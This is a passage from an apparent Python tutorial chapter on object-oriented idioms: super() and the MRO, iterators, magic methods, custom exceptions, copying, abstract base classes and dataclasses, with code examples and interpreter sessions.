The super() call is better than hard-wiring the parent class name, because it is a computed indirect reference. One of the advantages is that you do not need to specify the parent class by name anywhere. So, if the parent class changes its behavior (or is swapped out entirely), all the derived classes using super() will automatically respect it.

class InfoLogger(RandomMapper):   # new base class
    def __setitem__(self, key, value):
        logging.info('Setting %r to %r', key, value)
        super().__setitem__(key, value)

A lesser-known feature is that since the computed indirection is executed at runtime, you have the flexibility to modify the calculation and redirect to a different class.

Let us construct a logging ordered dictionary without modifying our existing classes:

class InfoLoggerOrdDict(InfoLogger, collections.OrderedDict):
    pass

The new class now has several different types in its ancestor tree: InfoLogger, OrderedDict, dict, and object. With this composition, the super().__setitem__ call inside InfoLogger is dispatched to OrderedDict rather than dict, because OrderedDict is the next class in the new Method Resolution Order. There was no alteration of the source code for InfoLogger. Rather, a subclass was created whose only logic is to compose two existing classes and control their search order.
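A quick, illustrative check of the composed class (this assumes the classes defined above are in scope; the logging.basicConfig call is only there to make the log line visible):

import logging
logging.basicConfig(level=logging.INFO)

d = InfoLoggerOrdDict()
d['answer'] = 42    # InfoLogger logs the assignment, then OrderedDict stores it
print(d)            # e.g. InfoLoggerOrdDict([('answer', 42)])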

Search order with Method Resolution Order (MRO)

In this section, we will dig deeper into the search order in the tree of ancestor classes. This is officially known as the Method Resolution Order, or MRO. You can simply view the MRO by printing the __mro__ attribute of the class in question:

>>> from pprint import pprint
>>> pprint(InfoLoggerOrdDict.__mro__)
(<class '__main__.InfoLoggerOrdDict'>,
 <class '__main__.InfoLogger'>,
 <class 'collections.OrderedDict'>,
 <class 'dict'>,
 <class 'object'>)

If we want to be able to influence the search order with a custom MRO, let us first see how it is computed. The sequence follows the order: the current class, its parent classes, and the parent classes of those parents, and so on, until we reach object, which is the root class of all classes in Python. All these sequences are ordered: child classes come before their parent classes, and for multiple parents, the order of the __bases__ tuple is followed. So, the MRO computed in the previous example is explained as follows:

InfoLoggerOrdDict comes before its parents, InfoLogger and OrderedDict.

InfoLogger comes before OrderedDict since InfoLoggerOrdDict.__bases__ is in that order.

InfoLogger comes before its base class which is dict.

OrderedDict comes before its base class which is dict.

dict comes before its base class, which is the root object class.

Linearization refers to the process of resolving these constraints. There are several research articles on this subject, but if all we want for now is to influence the order in the MRO, the following two points need to be noted:

Derived classes precede their base classes.

The base classes respect the order in which they appear in the __bases__ tuple.
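For instance, reusing the classes defined earlier, simply swapping the order of the bases swaps where OrderedDict and InfoLogger appear in the computed MRO:

import collections

class OrderedFirst(collections.OrderedDict, InfoLogger):
    pass

print([cls.__name__ for cls in OrderedFirst.__mro__])
# ['OrderedFirst', 'OrderedDict', 'InfoLogger', 'dict', 'object']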

Super() business advice

The business of super() is to dispatch function calls to a particular class in the ancestral tree of the instance. When we want the method re-ordering to be functional, we need to design our class accordingly. Let us strategize how we can create such a class:

Method signature should match called arguments in the tree: With normal functions, this is easier to ascertain since we know the method in advance. With super(), we usually have no idea who the callee is during development, because new (sub)classes may be added to the MRO at a later stage. One option is to use fixed function signatures with positional arguments, similar to the example in the previous section. A more flexible option is to make every method in the MRO tree of ancestors take keyword arguments along with a dictionary of keyword arguments (**kwargs). Each level uses only the arguments it needs and passes the remaining keyword arguments on to super(). The final call in the chain leaves **kwargs empty. Let’s take the following example to illustrate this:

class Car:
    def __init__(self, make_n_model, **kwargs):
        self.make_n_model = make_n_model
        super().__init__(**kwargs)

class ColorCar(Car):
    def __init__(self, color_of_car, **kwargs):
        self.color_of_car = color_of_car
        super().__init__(**kwargs)

my_car = ColorCar(color_of_car='silver', make_n_model='Honda City')

Ensuring existence of the target method: We have seen that the __init__ method of object exists as the final stop in the MRO chain of classes. So, any call in the class tree to __init__ will eventually reach object's __init__ method. Therefore, the method's existence is guaranteed for __init__ and the call will not raise an AttributeError. How about non-standard methods?

One way to handle such cases is to create a core/root class that sits just before object in the MRO, so that we can guarantee the existence of the method with its help. This is done with the help of an assert statement in that root class. Let us take an example extended from the previous Car class: we want to add a method called get_miles() and we need to ensure its existence in the inheritance chain. Here, in the Vehicle class, we can make use of defensive programming in order to make sure that no other get_miles() method is masked further along the chain. This ensures that when a subclass derives from the chain but not from Vehicle, you do not have duplicate methods.

class Vehicle:
    def get_miles(self):
        # The final stop before object
        assert not hasattr(super(), 'get_miles')

class Car(Vehicle):
    def __init__(self, make_n_model, **kwargs):
        self.make_n_model = make_n_model
        super().__init__(**kwargs)

    def get_miles(self):
        print('Getting miles on my:', self.make_n_model)
        super().get_miles()

class ColorCar(Car):
    def __init__(self, color_of_car, **kwargs):
        self.color_of_car = color_of_car
        super().__init__(**kwargs)

    def get_miles(self):
        print('Getting miles on my car of color:', self.color_of_car)
        super().get_miles()

>>> my_car = ColorCar(color_of_car='Silver', make_n_model='Honda City')
>>> my_car.get_miles()

When using this paradigm, you should clearly document that any deriving classes have to inherit from the Vehicle class to ensure the MRO behaves as expected. A good analogy of this already exists in Python, where all new exception classes have to inherit from the BaseException class. The last thing that needs to be ensured is that super() is invoked at every level of escalation in the MRO chain. The developers need to ensure that the super() call is added while designing the class.

The techniques that we discussed earlier are helpful for structuring classes that are flexibly composed or whose MRO can be re-ordered by deriving classes. One thing to note about the behavior of super() is that, when invoked with an instantiated object, it returns something bound to that object, giving the callee method access to the context of the object.

Technically, the call to super() will not return another method. Rather, the return value is a proxy object. Proxy objects help in delegation of the function calls to the appropriate class methods without explicitly creating another object for it.

Properties and attributes of objects

The object properties in Python are public in nature, and do not support any access specifiers for making them private or protected. You cannot prevent any calling object from accessing any attributes on the base object.

Python has no strict enforcement of access specifiers, but it is a community-driven language with several conventions that make up for it. When you begin an attribute name with a double underscore, you indicate that it is meant to be private to the scope of the object. We have already discussed the different uses of underscores in Python in Chapter 1. In this section, we will look at some other trivia of properties and attributes.

Iterable objects and their creation

Some commonly used Python objects like lists, sets, dictionaries, or tuples not just help in storing data but also provide constructs to be iterated over the values they store. Python empowers the developer to create his or her own iterables with custom logic. This is again, where magic methods are of use.

So, how does the iteration protocol in Python work? When you execute a loop like “for element in elements”, the interpreter verifies the following:

Whether the object has the __iter__ or __next__ iterator methods.

Whether the sequence object being iterated on has the __getitem__ or __len__ methods.

Sequences can be iterated over, and the preceding mechanisms enable this behavior. When an iteration is expected, the interpreter will call the iter() function over the object. This function in turn will invoke the __iter__ method, which will be run if present. Let us take a look at this with the help of the following example:

from datetime import date, timedelta

class IterateOverDateRange:
    def __init__(self, first_dt, last_dt):
        self.first_dt = first_dt
        self.last_dt = last_dt
        self._current_dt = first_dt

    def __iter__(self):
        return self

    def __next__(self):
        if self._current_dt >= self.last_dt:
            raise StopIteration
        current_dt = self._current_dt
        self._current_dt += timedelta(days=1)
        return current_dt

The preceding example iterates over a range of dates and returns the values between a start and an end date. It can be used as follows:

>>> for day in IterateOverDateRange(date(2020, 10, 11), date(2020, 10, 17)):
...     print(day)
...
2020-10-11
2020-10-12
2020-10-13
2020-10-14
2020-10-15
2020-10-16
>>>

When you start the preceding iteration, Python makes a call to the iter() function, which invokes __iter__. We have configured it to return self, which means that the result is itself an iterator, so control is transferred to the __next__ method. The __next__ method houses the logic that decides which element to return next. When we run out of values, it raises a StopIteration exception. The for loop handles that exception internally and terminates; however, once the values in the range are exhausted, the object stays exhausted, so it can be used for iteration only once.

>>> myRange = IterateOverDateRange(date(2020, 10, 11), date(2020, 10, 17))
>>> ", ".join(map(str, myRange))
'2020-10-11, 2020-10-12, 2020-10-13, 2020-10-14, 2020-10-15, 2020-10-16'
>>> len(list(myRange))    # the iterator is already exhausted
0

>>> max(myRange)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ValueError: max() arg is an empty sequence

The secret lies in the line where we returned self from the __iter__ method.

Alternatively, we can make __iter__ return a fresh iterator on every invocation. The following is an example of how we can accomplish this, with a new generator being created each time:

class IterateOverDateRange:
    def __init__(self, first_dt, last_dt):
        self.first_dt = first_dt
        self.last_dt = last_dt

    def __iter__(self):
        present_dt = self.first_dt
        while present_dt < self.last_dt:
            yield present_dt
            present_dt += timedelta(days=1)

Executing it again seems to get the job done:

>>> myRange = IterateOverDateRange(date(2020, 10, 11), date(2020, 10, 17))
>>> ", ".join(map(str, myRange))
'2020-10-11, 2020-10-12, 2020-10-13, 2020-10-14, 2020-10-15, 2020-10-16'
>>> len(list(myRange))
6
>>> max(myRange)
datetime.date(2020, 10, 16)

In the preceding iterable, every time looping is required, the __iter__ method is invoked and a new generator object is created. This is an example of a container iterable.

Sequence creation

For another alternative to create an iterable, without the implementation of the __iter__() method, we look at how sequences are created. When the __iter__ is not found, the interpreter looks for the next best thing – the __getitem__() method. If this method is also not present, then the interpreter will raise a TypeError exception.

To define a sequence, Python warrants the implementation of the __getitem__ and __len__ methods. A sequence also expects the elements to start at index zero, and the iterable should return the elements it contains individually in that order.

In the earlier example for iterating over dates, the memory footprint was very low. This is because, every time the next element was requested, its value was computed on demand.

The drawback of this approach is that if you wanted to access a value somewhere along the way, you have to iterate from the beginning to that point, thereby, increasing the CPU usage and the time taken considerably. This is a classic trade-off problem.

In Python, we can solve this by creating a sequence instead. A sequence will compute and store the values in memory, enabling iteration as well as random access in much less time (O(1) for accessing elements). It will only use a little more memory than the previous case. Let us see how that implementation looks:

from datetime import date, timedelta

class IterateOverDateRange:
    def __init__(self, first_dt, last_dt):
        self.first_dt = first_dt
        self.last_dt = last_dt
        self._rangeValues = self._get_range_values()

    def _get_range_values(self):
        date_list = []
        present_dt = self.first_dt
        while present_dt < self.last_dt:
            date_list.append(present_dt)
            present_dt += timedelta(days=1)
        return date_list

    def __len__(self):
        return len(self._rangeValues)

    def __getitem__(self, date_num):
        return self._rangeValues[date_num]

When executed in the interpreter, the object behaves in the following manner:

>>> myRange = IterateOverDateRange(date(2020, 10, 11), date(2020, 10, 17))
>>> for day in myRange:
...     print(day)
2020-10-11
2020-10-12
…
>>> myRange[1]
datetime.date(2020, 10, 12)
>>> myRange[4]
datetime.date(2020, 10, 15)
>>> myRange[-1]
datetime.date(2020, 10, 16)

In the example, we see that creating a sequence this way also lets the resulting object reuse the features of the object it wraps (in this case, a list), hence the support for the negative index.

Evaluate the trade-off between memory and CPU usage, when deciding on which one of the two possible implementations to use. In general, the iteration is preferable (and generators even more), but keep in mind the requirements of every case.

Container objects

An object in Python, which implements the __contains__ magic method, returning a Truth-value is referred to as a container. It is often used in conjunction with the in operator to check for membership:

if entity in myContainer

The Python interpreter translates this internally to the following:

myContainer.__contains__(entity)
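As a minimal sketch, a class only needs to implement __contains__ for the in operator to work against it; the GridMap name and its width/height fields are assumptions made for illustration:

class GridMap:
    def __init__(self, width, height):
        self.width = width
        self.height = height

    def __contains__(self, point):
        x, y = point
        return 0 <= x < self.width and 0 <= y < self.height

print((3, 4) in GridMap(10, 10))     # True
print((12, 4) in GridMap(10, 10))    # False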

Let us dive deeper into how we can effectively use this for a practical scenario. Assume that you are designing a game where the enemy target locations have to be marked on a 2D plane before the missiles are fired. Something like the following would get the job done:

def mark_target_locations(plane_map, point):
    # width/height and the mark() helper are assumed attributes of the map object
    if 0 <= point.x < plane_map.width and 0 <= point.y < plane_map.height:
        plane_map.mark(point)

The explicit boundary check works, but it buries the intent. If the map object implements __contains__ (like the GridMap sketch shown earlier), the same check reads far more naturally as if point in plane_map: plane_map.mark(point).

Dynamic attribute handling with __getattr__

The __getattr__ magic method is invoked only when the normal attribute lookup fails, which lets an object compute values for attributes that were never explicitly set. The following interactive session exercises an object, dynAttr, of such a class:

>>> dynAttr.attrib
'name_one'

>>> dynAttr.backup_result
'[backup restored] result'

>>> dynAttr.__dict__["backup_result2"] = "name_two"
>>> dynAttr.backup_result2
'name_two'

>>> getattr(dynAttr, "common", "default")
'default'

The first call simply returns the value of an existing attribute on the object. In the second case, the backup_result attribute does not exist; hence, __getattr__ is invoked, which is wired to compute a value for it. The third example demonstrates direct creation of an attribute in the instance dictionary; in this case, __getattr__ is not called since the normal lookup succeeds. As for the last example, notice that we raise an AttributeError when we cannot find the value. In a way, this is a mandatory requirement of the built-in getattr() function: if the logic raised a different exception, it would propagate and the default would not be returned.
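A minimal sketch of a class that would reproduce the behaviour shown above; the class name DynamicAttributes and the exact handling of the backup_ prefix are inferred from the session rather than taken from a full listing:

class DynamicAttributes:
    def __init__(self, attrib):
        self.attrib = attrib

    def __getattr__(self, name):
        # Called only when the normal attribute lookup fails
        if name.startswith("backup_"):
            return f"[backup restored] {name[len('backup_'):]}"
        raise AttributeError(f"{self.__class__.__name__} has no attribute {name!r}")

dynAttr = DynamicAttributes("name_one")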

Callable objects

Python allows you to create objects that can behave like functions. One of the many utilities of this feature is to create decorators that are more robust. We make use of the __call__ magic method, when the object is attempted to be executed, thereby impersonating a normal function. In addition, the arguments supplied to the object would be handed over to the __call__ method.

The advantage of defining objects as functions is that, unlike functions, objects can maintain their state, which can be persisted across different calls.

Python translates the object call into a __call__ method invocation.

object(*args, **kwargs) -> object.__call__(*args, **kwargs)

What this process helps us create is stateful functions, that is, functions with memory. The following example keeps track of how many times it has been called with each argument, and returns the count whenever requested:

from collections import defaultdict

class TrackFunctionCalls:
    def __init__(self):
        self._call_counter = defaultdict(int)

    def __call__(self, arg):
        self._call_counter[arg] += 1
        return self._call_counter[arg]

When you run this, the following results are as expected:

>>> call_count = TrackFunctionCalls()
>>> call_count(2912)
1
>>> call_count(1990)
1
>>> call_count(2912)
2
>>> call_count(2912)
3
>>> call_count("randomArg")
1

Let us now look at a summary of all the magic methods that we have been talking about in the past few sections:


Table 3.1: The Magic methods of Python

More Pythonic class conventions

Python classes are a useful and powerful construct to make Python object oriented in terms of design. In production code, most people focus on getting the job done, getting the right output, and since it is Python, that is easy to achieve. So, just like our brains, we do not really use the full power that the language arsenal has to offer since we rarely needed them. However, just like the brain, imagine the benefits if you really understood and used some of the lesser-known features. In this section, we will try to uncover a few of them.

Use __str__ for readable class representation

When you are defining a class that you know you will print() at some point, the default Python representation may not be very helpful. You can define a custom __str__ method to control how the different components should be printed for better clarity and readability.

The regular way:

class Car():
    def __init__(self, make, model):
        self.make = make
        self.model = model

>>> myCar = Car("Honda", "City")
>>> print(myCar)
# Prints something like '<__main__.Car object at 0x…>'

The Pythonic way:

class Car():
    def __init__(self, make, model):
        self.make = make
        self.model = model

    def __str__(self):
        return '{0}, {1}'.format(self.make, self.model)

>>> myCar = Car("Honda", "City")
>>> print(myCar)
# Prints 'Honda, City'

Make use of __repr__ for representing classes

Similar to how the __str__ method implementation allows us to display the class in a human-readable manner, the __repr__ method can be used to get a machine-readable representation of the class. The default implementation of __repr__ that Python supplies is not of much use. A good __repr__ should contain everything required to reconstruct the object; ideally, the object and its __repr__ output should be equivalent, which you can ascertain by using the following:

eval(repr(instance)) == instance

This is helpful in use cases for logging; for example, the constituents of a list object are displayed using the __repr__ and not the __str__ representation.

The Regular way:

class Car():
    def __init__(self, make='Honda', model='City', data_cache=None):
        self.make = make
        self.model = model
        self._cache = data_cache or {}

    def __str__(self):
        return 'Make: {}, Model: {}'.format(self.make, self.model)

def print_details(obj):
    print(obj)

>>> print_details([Car(), Car(data_cache={'Honda': 'Civic'})])
# Prints the default representations, e.g. [<__main__.Car object at 0x…>, <__main__.Car object at 0x…>]

The Pythonic way:

class Car():
    def __init__(self, make='Honda', model='City', data_cache=None):
        self.make = make
        self.model = model
        self._cache = data_cache or {}

    def __str__(self):
        return '{}, {}'.format(self.make, self.model)

    def __repr__(self):
        return 'Car({}, {}, {})'.format(self.make, self.model, self._cache)

def print_details(obj):
    print(obj)

>>> print_details([Car(), Car(data_cache={'Honda': 'Civic'})])
# Prints [Car(Honda, City, {}), Car(Honda, City, {'Honda': 'Civic'})]

The __str__ method implementation allows us to display the class in human readable manner. Similarly, the __repr__ method can be used to get a machine readable format for the class.

Custom exception classes

Python comes with an arsenal of exception types and corresponding handler classes. Sometimes, when writing your own software, you might want to create your own custom exceptions. They not only help in adding more information for debugging the errors in the code, but also keep the code base maintainable in due course. This section will give you pointers on how to create effective exception classes. Let us take the following example of a string validator:

def ensureLength(email_id):
    if len(email_id) < 10 or '@' not in email_id:
        raise ValueError

If the email id entered is less than 10 characters long or does not contain '@', we throw a ValueError exception. This works fine, but the error is generic, and people who do not have first-hand experience with the code will never know what it means or how to debug things further. Clients who simply use your code will see a generic error:

>>> ensureLength('random')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 3, in ensureLength
    raise ValueError
ValueError

For those who have not written the code, this exception would not be easy to understand. Then, several person-hours have to be spent in reading and interpreting the error for large codebases. We can make this more convenient, by using the custom exceptions which give a clearer idea of the error at hand:

class LessCharactersInEmailID(ValueError):
    pass

def ensureLength(email_id):
    if len(email_id) < 10:
        raise LessCharactersInEmailID(email_id)

Here, we extend the ValueError class to a more specialized and easy-to-understand name. We can also extend the Python base Exception class if we want to catch and process a larger pool of exceptions.

>>> ensureLength('random')
---------------------------------------------------------------------------
LessCharactersInEmailID                   Traceback (most recent call last)
<ipython-input> in <module>
----> 1 ensureLength('random')

<ipython-input> in ensureLength(email_id)
      4 def ensureLength(email_id):
      5     if len(email_id) < 10:
----> 6         raise LessCharactersInEmailID(email_id)

LessCharactersInEmailID: random

When you encounter issues in production code, custom exceptions make it easier to identify, pinpoint, and resolve the errors in the call stack of the thrown exception. If you are working on a project, writing a base class for your exceptions, and deriving specific exceptions from it, goes a long way in scaling the code.

class MyScriptValidations(Exception):
    pass

class LessCharactersInEmailID(MyScriptValidations):
    pass

class IncorrectEmailFormat(MyScriptValidations):
    pass

…

It is usually not considered Pythonic to use generic except: statements for exception handling; they are considered an antipattern.

This style of exception handling goes on to enforce the EAFP (Easier to Ask for Forgiveness than Permission) paradigm propagated by Python.
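For instance, calling code can follow EAFP by simply attempting the validation and handling the specific exception; user_input here is a hypothetical value:

user_input = 'random'
try:
    ensureLength(user_input)
except LessCharactersInEmailID as exc:
    print(f"Email id too short: {exc}")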

Cloning Python objects

Python does not do a deep copy every time an assignment takes place. Instead, you only create a reference and bind the name to the object. For immutable or read-only objects, the kind of copy is irrelevant. However, for objects that can be modified, having shallow copies of the data shares the same object across multiple references – so, changing the underlying object will impact all the references, whether intended or not. Hence, a deep copy should always be preferred for mutable objects. Shallow copies create a new collection, and the references are created to the child objects from the original data. They are one level deep and are not real copies, as they do not recurse over the object. A deep copy, on the other hand, recurses over the structure and creates a copy or an independent clone of the object and its contents. Let us look at this with some of the following practical examples:

Shallow copies:

Copies created with the built-in collection constructors (such as list(), dict(), and set()) are shallow in nature:

>>> list1 = [[4, 5, 6], [7, 8, 9]]
>>> list2 = list(list1) # Shallow copy created

>>> list1, list2
([[4, 5, 6], [7, 8, 9]], [[4, 5, 6], [7, 8, 9]])

>>> list1.append([1, 2, 3])
>>> list1, list2
([[4, 5, 6], [7, 8, 9], [1, 2, 3]], [[4, 5, 6], [7, 8, 9]])

>>> list1[1][0] = 'A'
>>> list1, list2
([[4, 5, 6], ['A', 8, 9], [1, 2, 3]], [[4, 5, 6], ['A', 8, 9]])

It is evident from the preceding example that even though the two list objects are independent, they still share references to the same child objects from when they were created; mutating a shared inner list is visible through both.

Deep copies: Python’s default behavior is a shallow copy. However, depending on the use case, more often than not, you will find yourself wanting to create actual independent copies of the objects or data structures. In such cases, the copy module in Python comes to the rescue.

>>> import copy
>>> list1 = [[4, 5, 6], [7, 8, 9]]
>>> list2 = copy.deepcopy(list1)

If we perform the same experiment as earlier, we can verify that both the lists created are actually independent data structures.

>>> list1[1][0] = 'A'
>>> list1
[[4, 5, 6], ['A', 8, 9]]

>>> list2
[[4, 5, 6], [7, 8, 9]]

The copy module exposes the copy.deepcopy() API to create a full clone of an object. It also provides copy.copy(), which facilitates the creation of shallow copies. Using these functions is the preferred approach, since it clearly indicates the type of copy the developer intended to carry out, and is considered Pythonic.
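Continuing with nested lists like the ones above, the two APIs make the sharing explicit; the identity checks below simply confirm which inner objects are shared:

>>> import copy
>>> list1 = [[4, 5, 6], [7, 8, 9]]
>>> shallow = copy.copy(list1)
>>> deep = copy.deepcopy(list1)
>>> shallow[0] is list1[0]    # the shallow copy shares the inner lists
True
>>> deep[0] is list1[0]       # the deep copy recursed and cloned them
False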

Abstract base classes with abc module for inheritance

When designing a project, the factors for which we generally want to ensure maintainability in the long run are as follows:

The base class should not permit direct instantiation.

Relevant errors should be reported when the interface methods are not implemented. This is where Abstract Base Classes prove useful. ABCs enforce method implementation from the parent or base class. The abc module in Python aids the handling of Abstract Base Classes. Let us see the utility of the module with the help of the following example:

from abc import abstractmethod, ABCMeta

class BaseClass(metaclass=ABCMeta):
    @abstractmethod
    def alpha(self):
        pass

    @abstractmethod
    def beta(self):
        pass

class DerivedClass(BaseClass):
    def alpha(self):
        pass

Notice that we have skipped the implementation of the beta method. To ascertain that the class hierarchy has been properly created, we can verify by using the following:

assert issubclass(DerivedClass, BaseClass)

So, what is the consequence of skipping the beta method instantiation? When you try creating the object, it will raise an exception for the missing methods:

>>> myObj = DerivedClass()
…
TypeError: Can't instantiate abstract class DerivedClass with abstract methods beta

Notice the error: had we not defined the methods as abstract (and instead relied on raising NotImplementedError in the base class), the failure would only have surfaced when the missing method was actually called. The abc module explicitly tells the user, at instantiation time, which methods are missing. This helps in the avoidance of many bugs, thereby creating robust and maintainable software architectures in production.

Pitfalls of class vs instance variable

Python differentiates between instance and class variables. Class variables are independent of any instances of the class and are defined within the scope of the class. They persist information at the class level, and every instantiated object has access to the same class variables.

Class variables can be leveraged when you want to share the information between all the instances of the class.

The Instance variables, on the other hand, are specific to a created object. The information of these variables are stored in the memory specific for that object. They are independent from the other instance variables. Let us illustrate this with the following code:

class Book:
    num_of_pages = 304        # class variable

    def __init__(self, title):
        self.title = title    # instance variable

>>> fiction = Book('Harry Potter')
>>> romance = Book('Fault in our Stars')
>>> fiction.title, romance.title
('Harry Potter', 'Fault in our Stars')

The class variables can be accessed by directly using the class, as well as by using the objects created from the class:

>>> fiction.num_of_pages, romance.num_of_pages
(304, 304)

>>> Book.num_of_pages
304

That seemed simple. Now, say that the fiction author can summarize all his content in a 200 page book. Can the code be updated to accommodate that? One way could be to update the variable in the class itself:

>>> Book.num_of_pages = 200

You see why the preceding code will not work out? By updating a class variable, you have updated all the existing books to have only 200 pages. That is definitely not what we were looking for.

>>> fiction.num_of_pages, romance.num_of_pages

(200, 200)

Now, if we try to update one of the book’s properties back to the original number of pages, let us see what happens:

>>> Book.num_of_pages = 304
>>> fiction.num_of_pages = 200
>>> fiction.num_of_pages, romance.num_of_pages, Book.num_of_pages
(200, 304, 304)

This looks fine, but what happened under the hood? When you explicitly set the value on the fiction object, we made the object add an attribute with the same name as the class variable, as an instance variable.

Instance variables have a higher priority than the class variables, having the same name within the scope.

You can differentiate the two as follows:

>>> fiction.num_of_pages, fiction.__class__.num_of_pages
(200, 304)

They are powerful features indeed, but caution is advised when you are playing with variables at the class and instance levels, especially instantiating and updating them.

Using self or classmethod with class’s attributes

Class-level attributes do not need an instance of the class for usage. Some ORMs mandate that model classes define something like a __database__ attribute. Consider a Portfolio application model class, which could define the value of __database__ as ‘portfolio’. Now, if we want to access this table-name property, writing it as Portfolio.__database__ directly may not be the right thing to do, and it could lead to problems. Instead, we can create a getter method, say get_database(self), on the Portfolio class, which returns the value. However, an issue persists: what we wanted was to “retrieve the __database__ property of the current class”, but a hard-coded getter would only ever return the Portfolio class’s attribute. Let us try to solve this.

If the getter method we discussed is defined as a class method, using the classmethod decorator, it could be defined as the following:

@classmethod
def get_database(cls):
    return cls.__database__

The regular way:

class Portfolio():
    __database__ = 'portfolio'

    def get_database(self):
        return Portfolio.__database__

class DerivedPortfolio(Portfolio):
    __database__ = 'derived_portfolio'

>>> b = DerivedPortfolio()
>>> print(b.get_database()) # prints 'portfolio', not 'derived_portfolio'

The Pythonic way:

class Portfolio():
    __database__ = 'portfolio'

    def get_database(self):
        return self.__database__

    @classmethod
    def get_another_database(cls):
        return cls.__database__

class DerivedPortfolio(Portfolio):
    __database__ = 'derived_portfolio'

>>> b = DerivedPortfolio()
>>> print(b.get_database()) # prints 'derived_portfolio'

When a derived class calls the getter defined as a class method, the cls value is set to the inheriting class, rather than Portfolio. If the method has a reference to self, you can simply access the attribute using the self.__database__ construct. This helps to achieve both purposes.

Classes are not just for encapsulation!

New developers usually understand classes in Python, but have little idea as to what warrants their use. Sometimes, one just creates a class to group several stray methods in a module, even though they do not share any related state or any API boundary.

Unlike Java, Python treats the module as the unit of encapsulation, and not actually classes.

Even though Python treats the modules as the unit of encapsulation, it is still perfectly acceptable to have modules comprised of ‘stray functions’ and call them from somewhere else in the code. If you have functions that should not be exported, you should use the __all__ attribute of the module to list the names that are to be exposed to the external world and the other modules.
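A minimal sketch of the idea, assuming a module named string_utils.py; only the names listed in __all__ are pulled in by a wildcard import such as from string_utils import *:

# string_utils.py
__all__ = ['substring_count', 'is_palindrome']   # strrev stays module-internal

def substring_count(core_str, substring): ...
def strrev(core_str): ...
def is_palindrome(core_str): ...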

The regular way:

class StringFunctions():
    def substring_count(self, core_str, substring):
        return sum([1 for c in core_str if c == substring])

    def strrev(self, core_str):
        return reversed(core_str)

    def is_palindrome(self, core_str):
        for index in range(len(core_str)//2):
            if core_str[index] != core_str[-index-1]:
                return False
        return True

>>> strfns = StringFunctions()

The Pythonic way:

def substring_count(core_str, substring):
    return sum([1 for c in core_str if c == substring])

def strrev(core_str):
    return reversed(core_str)

def is_palindrome(core_str):
    for index in range(len(core_str)//2):
        if core_str[index] != core_str[-index-1]:
            return False
    return True

In the preceding examples, the class is not necessary as the member methods can simply be independently run, and do not need access to a class state. That is what Modules are for in Python.

Fetching object type using the isinstance function

Whoever told you that Python does not have types cannot be trusted. Python is built on types, and internally uses types and related errors. You cannot use a mathematical operator between a string and a double; it will throw a TypeError. Python does know about the types, it just does not tell you about them until needed. If you are developing code that needs to change its behavior based on the type of its arguments, you can use the isinstance method. Let us understand how this method works:

isinstance(object, classinfo)

This method is a built-in API, which returns the Truth value if the object type matches the type passed in as the second positional argument. If a tuple is passed as the second argument, then the type or subtype is checked for any matches of the tuple elements. You can even use the isinstance to check for any user-defined types and not just the built-in types.

The Regular way:

def sizeCheck(obj_name):
    try:
        return len(obj_name)
    except TypeError:
        if obj_name in (True, False, None):
            return 1
        else:
            return int(obj_name)

>>> sizeCheck('someString')
>>> sizeCheck([96, 3, 25, 45, 0])
>>> sizeCheck(95)

The Pythonic way:

def sizeCheck(obj_name):
    if isinstance(obj_name, (list, dict, str, tuple)):
        return len(obj_name)
    elif isinstance(obj_name, (bool, type(None))):
        return 1
    elif isinstance(obj_name, (int, float)):
        return int(obj_name)

>>> sizeCheck('someString')
>>> sizeCheck([96, 3, 25, 45, 0])
>>> sizeCheck(95)

The use of the isinstance built-in makes the comparison explicit and clear, while also providing a mechanism to handle different types differently.
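As noted above, isinstance also works with user-defined types, and a tuple as the second argument matches any of its members; the Vehicle and Car classes here are just an illustration:

class Vehicle:
    pass

class Car(Vehicle):
    pass

print(isinstance(Car(), Vehicle))           # True, instances of subclasses match
print(isinstance(Car(), (list, Vehicle)))   # True, any type in the tuple matches
print(isinstance(42, Vehicle))              # False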

Data classes

Remember structs in C++, which only stored the information and allowed you to pass them around as packets of data? Python achieves the same and more with the advent of Dataclasses. A dataclass theoretically should contain just data, but there are no such restrictions.

Creating and operating on data classes

You can create a data class by using the @dataclass decorator around the class.

from dataclasses import dataclass

@dataclass
class CardClass:
    card_rank: str
    suit_of_card: str

Data classes have some pre-configured functionality to create instances of the class, print the contents of the class, and compare between the different data class instances.

>>> king_of_clubs = CardClass('K', 'Clubs')
>>> king_of_clubs.card_rank
'K'

>>> king_of_clubs
CardClass(card_rank='K', suit_of_card='Clubs')
>>> king_of_clubs == CardClass('K', 'Clubs')
True

The ‘:’ notation in defining the fields of the dataclass is a new Python 3 feature called Variable Annotations.

Dataclasses can also be created in a similar manner to how we go about creating tuples in the code:

from dataclasses import make_dataclass

coordinates = make_dataclass('Coordinates', ['Place', 'latitude', 'longitude'])

Data classes come with the __eq__ and __init__ methods predefined for use. As an alternative to writing an __init__ method yourself, you can directly supply default values for the fields while they are being defined:

from dataclasses import dataclass

@dataclass
class Car:
    make: str = ''
    model: str = ''
    age: int = 0
    mileage: float = 0.0
    price: float = 0.0

The data classes mandate the use of type hints when you define the fields in the class. If you do not supply a type annotation, the field is ignored. However, if the type is not known in advance, Python provides the typing.Any generic type.

from dataclasses import dataclass
from typing import Any

@dataclass
class Car:
    make: Any
    model: Any = ''
    feature: Any = 'New Car'

Adding type is mandatory, but Python does not enforce them at runtime as errors.
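For instance, continuing with the Car data class above, values that contradict the annotations are accepted without complaint; the hints are metadata, not runtime checks:

>>> Car(make=42, model=[3, 4])
Car(make=42, model=[3, 4], feature='New Car')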

Given that data classes are regular classes, apart from the data, you can also add methods to them.

from dataclasses import dataclass

@dataclass
class Car:
    make: str = ''
    model: str = ''
    mfg_year: int = 0
    mileage: float = 0.0
    price: float = 0.0

    def get_current_price(self, sale_year):
        depreciation = (15 - (sale_year - self.mfg_year)) / 15
        return depreciation * self.price

Dataclasses can be defined using the default dataclass decorator, or we can customize the decorator with some allowed arguments within parentheses. The different parameters that are supported are as follows:

init: whether the __init__ method should be added.

repr: whether the __repr__ method is included.

eq: whether the __eq__ method is included.

The default value for the preceding arguments is True. The other arguments that can be passed are as follows:

frozen: creates a read-only data class whose fields cannot be modified.

order: whether the ordering (comparison) methods should be added.

unsafe_hash: whether a __hash__ method is included.

The preceding arguments have default values of False.
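For instance, passing order=True generates the comparison methods, and combining it with frozen=True makes the instances read-only and hashable; the Version class here is purely illustrative:

from dataclasses import dataclass

@dataclass(order=True, frozen=True)
class Version:
    major: int
    minor: int

print(Version(3, 7) < Version(3, 10))    # True, compares the fields as a tuple
print({Version(3, 7): 'supported'})      # frozen + eq makes instances hashable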

Immutable data classes

